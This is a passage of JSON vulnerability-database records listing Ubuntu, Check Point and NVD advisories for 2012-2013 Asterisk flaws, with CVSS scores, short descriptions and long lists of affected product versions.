NOTE: some of these details are\nobtained from third party information.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5641", "href": "https://ubuntu.com/security/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:27:03", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x\nbefore 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk\nDigiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous\ncalls are enabled, allow remote attackers to cause a denial of service\n(resource consumption) by making anonymous calls from multiple sources and\nconsequently adding many entries to the device state cache.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230>\n", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2012-5977", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-01-04T00:00:00", "id": "UB:CVE-2012-5977", "href": "https://ubuntu.com/security/CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:27:04", "description": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x\nbefore 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified\nAsterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones\n10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to\ncause a denial of service (daemon crash) via TCP data using the (1) SIP,\n(2) HTTP, or (3) XMPP protocol.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230>\n", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2012-5976", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-04T00:00:00", "id": "UB:CVE-2012-5976", "href": "https://ubuntu.com/security/CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:22:58", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk\nOpen Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before\n11.6.1; Asterisk with Digiumphones 10.x-digiumphones before\n10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 
and\n11.x before 11.2-cert3 allows remote attackers to cause a denial of service\n(daemon crash) via a 16-bit SMS message with an odd number of bytes, which\ntriggers an infinite loop.", "cvss3": {}, "published": "2013-12-19T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7100", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-19T00:00:00", "id": "UB:CVE-2013-7100", "href": "https://ubuntu.com/security/CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:25:44", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open\nSource 11.x before 11.2.2 allows remote attackers to execute arbitrary code\nvia a long sprop-parameter-sets H.264 media attribute in a SIP Session\nDescription Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2685", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2685", 
"href": "https://ubuntu.com/security/CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:25:45", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x\nbefore 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before\n1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones\nexhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER\ntransactions depending on whether the user account exists, which allows\nremote attackers to enumerate account names by (1) reading HTTP status\ncodes, (2) reading additional text in a 403 (aka Forbidden) response, or\n(3) observing whether certain retransmissions occur.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=704114>\n", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2264", "href": "https://ubuntu.com/security/CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:16:24", "description": "A stack overflow vulnerability has been reported in Digium Asterisk. 
The vulnerability is due to an unchecked memory allocation on the stack, which can result in a stack overflow or writing of attacker-controlled data to arbitrary memory locations. A remote attacker can use this vulnerability by sending a malicious request to a vulnerable Asterisk server.", "cvss3": {}, "published": "2013-01-20T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk HTTP Management Interface Stack Overflow (CVE-2012-5976; CVE-2013-2686)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-11-25T00:00:00", "id": "CPAI-2013-029", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-11-28T06:59:26", "description": "A denial of service vulnerability exists in Asterisk Open Source, Certified Asterisk and Asterisk with Digiumphones.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Invalid SDP Media Descriptions Denial of Service (CVE-2013-5642)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2961", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:01:13", "description": "A denial of service vulnerability exists in Asterisk Open Source and Certified Asterisk.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Terminated Channel ACK with SDP Denial of Service 
(CVE-2013-5641)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5641"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-3492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T06:59:23", "description": "A buffer overflow vulnerability exists in Asterisk Open Source.", "cvss3": {}, "published": "2013-06-30T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP SDP Header Parsing Stack Buffer Overflow (CVE-2013-2685)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2685"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-1661", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:38:08", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon crash) via a crafted HTTP POST request. 
NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2686", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T16:55:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:digiumphones:10.6.0", "cpe:/a:asterisk:open_source:1.8.7.2", "cpe:/a:asterisk:open_source:1.8.9.2", "cpe:/a:asterisk:open_source:1.8.3.2", "cpe:/a:asterisk:open_source:10.1.0", "cpe:/a:asterisk:open_source:1.8.18.0", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:digiumphones:10.12.1", "cpe:/a:asterisk:open_source:1.8.14.1", "cpe:/a:asterisk:open_source:10.1.1", "cpe:/a:asterisk:open_source:1.8.16.0", "cpe:/a:asterisk:open_source:1.8.10.0", "cpe:/a:asterisk:open_source:1.8.4.1", "cpe:/a:asterisk:digiumphones:10.11.0", "cpe:/a:asterisk:open_source:10.0.0", "cpe:/a:asterisk:open_source:1.8.1", "cpe:/a:asterisk:digiumphones:10.0.0", "cpe:/a:asterisk:digiumphones:10.3.0", "cpe:/a:asterisk:digiumphones:10.2.0", "cpe:/a:asterisk:open_source:1.8.4.2", "cpe:/a:asterisk:open_source:1.8.7.0", "cpe:/a:asterisk:digiumphones:10.9.0", "cpe:/a:asterisk:open_source:11.0.0", "cpe:/a:asterisk:open_source:10.2.0", "cpe:/a:asterisk:open_source:10.5.0", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:10.4.1", "cpe:/a:asterisk:open_source:1.8.4.4", "cpe:/a:asterisk:open_source:1.8.4", "cpe:/a:asterisk:open_source:1.8.2", 
"cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:1.8.3.1", "cpe:/a:asterisk:open_source:10.1.2", "cpe:/a:asterisk:open_source:1.8.8.0", "cpe:/a:asterisk:open_source:1.8.3", "cpe:/a:asterisk:open_source:1.8.12", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:1.8.5", "cpe:/a:asterisk:open_source:1.8.7.1", "cpe:/a:asterisk:open_source:1.8.19.1", "cpe:/a:asterisk:open_source:1.8.11.0", "cpe:/a:asterisk:open_source:1.8.3.3", "cpe:/a:asterisk:open_source:1.8.2.4", "cpe:/a:asterisk:open_source:1.8.15.0", "cpe:/a:asterisk:digiumphones:10.10.0", "cpe:/a:asterisk:open_source:1.8.20.1", "cpe:/a:asterisk:open_source:10.3.1", "cpe:/a:asterisk:open_source:1.8.1.1", "cpe:/a:asterisk:open_source:10.9.0", "cpe:/a:asterisk:open_source:1.8.2.3", "cpe:/a:asterisk:open_source:10.7.1", "cpe:/a:asterisk:open_source:1.8.8.1", "cpe:/a:asterisk:open_source:10.6.0", "cpe:/a:asterisk:open_source:1.8.9.1", "cpe:/a:asterisk:digiumphones:10.1.0", "cpe:/a:asterisk:open_source:10.5.1", "cpe:/a:asterisk:open_source:10.8.0", "cpe:/a:asterisk:open_source:1.8.11.1", "cpe:/a:asterisk:open_source:10.11.0", "cpe:/a:asterisk:open_source:10.12.1", "cpe:/a:asterisk:open_source:1.8.4.3", "cpe:/a:asterisk:open_source:1.8.12.2", "cpe:/a:asterisk:open_source:1.8.1.2", "cpe:/a:asterisk:open_source:1.8.10.1", "cpe:/a:asterisk:open_source:1.8.12.1", "cpe:/a:asterisk:open_source:1.8.8.2", "cpe:/a:asterisk:open_source:10.11.1", "cpe:/a:asterisk:open_source:1.8.12.0", "cpe:/a:asterisk:open_source:1.8.18.1", "cpe:/a:asterisk:open_source:1.8.5.0", "cpe:/a:asterisk:open_source:10.2.1", "cpe:/a:asterisk:open_source:1.8.15.1", "cpe:/a:asterisk:open_source:1.8.14.0", "cpe:/a:asterisk:open_source:10.10.0", "cpe:/a:asterisk:digiumphones:10.4.0", "cpe:/a:asterisk:certified_asterisk:1.8.15.0", "cpe:/a:asterisk:open_source:10.1.3", "cpe:/a:asterisk:open_source:1.8.13.0", "cpe:/a:asterisk:digiumphones:10.12.0", "cpe:/a:asterisk:open_source:10.4.2", "cpe:/a:asterisk:open_source:10.5.2", 
"cpe:/a:asterisk:open_source:1.8.13.1", "cpe:/a:asterisk:open_source:1.8.6.0", "cpe:/a:asterisk:digiumphones:10.8.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:digiumphones:10.7.0", "cpe:/a:asterisk:open_source:10.6.1", "cpe:/a:asterisk:open_source:1.8.9.3", "cpe:/a:asterisk:open_source:1.8.0", "cpe:/a:asterisk:certified_asterisk:1.8.15", "cpe:/a:asterisk:open_source:10.12.0", "cpe:/a:asterisk:open_source:1.8.17.0", "cpe:/a:asterisk:open_source:1.8.20.0", "cpe:/a:asterisk:open_source:1.8.2.2", "cpe:/a:asterisk:open_source:1.8.19.0", "cpe:/a:asterisk:open_source:1.8.2.1", "cpe:/a:asterisk:open_source:1.8.9.0", "cpe:/a:asterisk:open_source:10.4.0", "cpe:/a:asterisk:open_source:10.3.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:digiumphones:10.5.0", "cpe:/a:asterisk:open_source:10.0.1", "cpe:/a:asterisk:open_source:10.7.0", "cpe:/a:asterisk:open_source:10.10.1"], "id": "CVE-2013-2686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc3:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc3:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc2:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc3:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.1:*:*:*:*:*:*:*", 